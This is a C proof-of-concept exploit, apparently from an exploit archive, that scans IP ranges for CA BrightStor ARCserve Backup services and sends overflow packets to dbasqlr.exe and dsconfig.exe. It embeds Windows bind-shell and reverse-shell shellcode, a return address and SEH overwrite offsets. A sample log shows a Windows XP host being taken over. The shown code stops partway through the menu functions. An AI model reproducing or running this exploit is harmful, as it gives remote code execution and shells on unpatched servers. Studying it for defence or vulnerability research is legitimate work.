ca brightstor arcserve backup vulnerabilities scanner and exploiter.txt

一些可以实现益出的程序

/*
* 02/20/2005
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* exploit by : cybertronic
*
* cybertronic[at]gmx[dot]net
*
* This exploits the following vulnerabilities:
*
* Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
* Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe
*
* I included a vulnerability scanner, that scans for the bugs mentioned above
* and logs to "scan.log" in working directory.
* You have to adjust the timeout, it works fine on my network with
* usec = 10000: ~10 hosts / sec
*
* some greetz fly to:
* HD Moore - I`ll pay you some drinks, you know what they are for ;)
* houseofdabus
*
* compile: gcc -o greetz_to_ca greetz_to_ca.c
*
* below is a screenshot of scan-mode:
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
*
* --[ choose
* |
* |--[0] = start scanner
* `--[1] = send some greetings to ca
*
* $ 0
*
* --[ enter IP-range
* |
* |--[start-ip] $ 192.168.2.90
* `--[end-ip ] $ 192.168.2.120
*
* --[ select port to scan for
* |
* |--[ 6070] = dbasqlr
* `--[41523] = dsconfig
*
* $ 6070
*
* --[ I can try to exploit the bug, shall I ?
* |
* |--[0] yes, try it!
* `--[1] no, i`am on my own!
*
* $ 0
*
* --[ select shellcode
* |
* |--[0] = bindshell
* `--[1] = reverseshell
*
* $ 0
*
* oO---[ scanner - scan.log ]---Oo
*
* [192.168.2.90:6070] closed
* [192.168.2.91:6070] closed
* [192.168.2.92:6070] closed
* [192.168.2.93:6070] closed
* [192.168.2.94:6070] closed
* [192.168.2.95:6070] closed
* [192.168.2.96:6070] closed
* [192.168.2.97:6070] closed
* [192.168.2.98:6070] closed
* [192.168.2.99:6070] closed
* [192.168.2.100:6070] closed
* [192.168.2.101:6070] open
*

// the first one is a fake service that was running by accident ( netcat -l -p 6070 )


* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.101:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.101:4444...failed!
*
* [192.168.2.102:6070] open
*
* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.102:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.102:4444...done!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINDOWS\system32>exit
* exit
* bye bye...
* [192.168.2.103:6070] closed
* [192.168.2.104:6070] closed
* [192.168.2.105:6070] closed
* [192.168.2.106:6070] closed
* [192.168.2.107:6070] closed
* [192.168.2.108:6070] closed
* [192.168.2.109:6070] closed
* [192.168.2.110:6070] closed
* [192.168.2.111:6070] closed
* [192.168.2.112:6070] closed
* [192.168.2.113:6070] closed
* [192.168.2.114:6070] closed
* [192.168.2.115:6070] closed
* [192.168.2.116:6070] closed
* [192.168.2.117:6070] closed
* [192.168.2.118:6070] closed
* [192.168.2.119:6070] closed
* [192.168.2.120:6070] closed
*
* oO---[ scan completed ]---Oo
*
* [ cybertronic @ CA ] #
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

/*
*
* definitions
*
*/

#define PORT_DBASQLR 6070
#define PORT_DSCONFIG 41523

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

/*
*
* prototypes
*
*/

int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int isip ( char *ip );
int is_open ( char* ip, unsigned short tport );
int select_action ();
int select_shellcode ();
int select_vulnerability ();
int shell ( int s, char* tip, unsigned short cbport );

void connect_to_bindshell ( char* tip, unsigned short bport );
void fall_asleep ( int sec );
void header ();
void start_reverse_handler ( int cbport );
void usage ( char* name );

/*********************
* Windows Shellcode *
*********************/

/*
* Type : bind shellcode
* Length: 500 bytes
* Port : 4444 / 0x115c
*
*/

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

unsigned char greetz[] =
"\x20\x41\x54\x20\x4c\x45\x41\x53\x54\x20\x53\x4f\x4d\x45\x20\x47"
"\x52\x45\x45\x54\x5a\x20\x46\x4c\x59\x20\x54\x4f\x3a\x20\x48\x44"
"\x4d\x2c\x20\x54\x48\x43\x2c\x20\x41\x4e\x44\x20\x43\x41\x20\x4f"
"\x46\x20\x43\x4f\x55\x52\x53\x45\x20\x3a\x29\x20\x2d\x20\x43\x59"
"\x42\x45\x52\x54\x52\x4f\x4e\x49\x43\x20";

/*
*
* structures
*
*/

typedef struct _args {
char* tip;
char* lip;
int tport;
int lport;;
} args;

/*
*
* functions
*
*/

int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
return ( s );
}

int
exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
unsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll
char buffer[3289];

bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 ); //good code <-------.
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); // |
memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 ); //jmp back 1840 bytes --'

if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

printf ( "--[ exploiting " YELLOW "dbasqlr.exe" NORMAL"...\n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}

int
exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
char buffer[4129];

bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );

buffer[ 0] = 0x9b;
buffer[ 1] = 0x53; //S
buffer[ 2] = 0x45; //E
buffer[ 3] = 0x52; //R
buffer[ 4] = 0x56; //V
buffer[ 5] = 0x49; //I
buffer[ 6] = 0x43; //C
buffer[ 7] = 0x45; //E
buffer[ 8] = 0x50; //P
buffer[ 9] = 0x43; //C
buffer[10] = 0x18;
buffer[11] = 0x01;
buffer[12] = 0x02;
buffer[13] = 0x03;
buffer[14] = 0x04;
buffer[15] = 0x53; //S
buffer[16] = 0x45; //E
buffer[17] = 0x52; //R
buffer[18] = 0x56; //V
buffer[19] = 0x49; //I
buffer[20] = 0x43; //C
buffer[21] = 0x45; //E
buffer[22] = 0x50; //P
buffer[23] = 0x43; //C
buffer[24] = 0x01;
buffer[25] = 0x0c;
buffer[26] = 0x6c;
buffer[27] = 0x93;
buffer[28] = 0xce;
buffer[29] = 0x18;
buffer[30] = 0x18;

memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1056, "\xeb\x06", 2 );
memcpy ( buffer + 1060, "\x14\x57\x80\x23", 4 ); //SEH
if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );

printf ( "--[ exploiting " YELLOW "dsconfig.exe" NORMAL "...\n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}

int
isip ( char *ip )
{
int a, b, c, d;

if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}

int
is_open ( char* ip, unsigned short tport )
{
int s, n, error;
int flags;
int sec = 0; //change this for wan
unsigned long usec = 10000; //works fine on my lan
struct sockaddr_in remote_addr;
struct timeval tval;
fd_set rset, wset;
socklen_t len;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
inet_pton ( AF_INET, ip, &remote_addr.sin_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( -1 );
}

if ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )
{
close ( s );
return ( -1 );
}
if ( fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )
{
close ( s );
return ( -1 );
}
if ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) == -1 )
{
if ( errno != EINPROGRESS )
{
close ( s );
return ( -1 );
}
}
if ( n == 0 )
goto done; /* connect completed immediately */
FD_ZERO ( &rset );
FD_SET ( s, &rset );
wset = rset;
tval.tv_sec = sec;
tval.tv_usec = usec;

if ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )
{
close ( s ); /* timeout */
errno = ETIMEDOUT;
return ( 1 );
}
if ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )
{
len = sizeof ( error );
if ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )
return ( -1 );
}
else
{
printf ( "select failed!\n" );
exit ( 1 );
}
done:
if ( fcntl ( s, F_SETFL, flags ) < 0 )
{
close ( s );
return ( -1 );
}
if ( error )
{
close ( s );
errno = error;
return ( -1 );
}
return ( 0 );
}

int
select_action ()
{
int ret;

printf ( "\n" );
printf ( "--[ choose\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = start scanner\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = send some greetings to ca\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
return ( ret );
}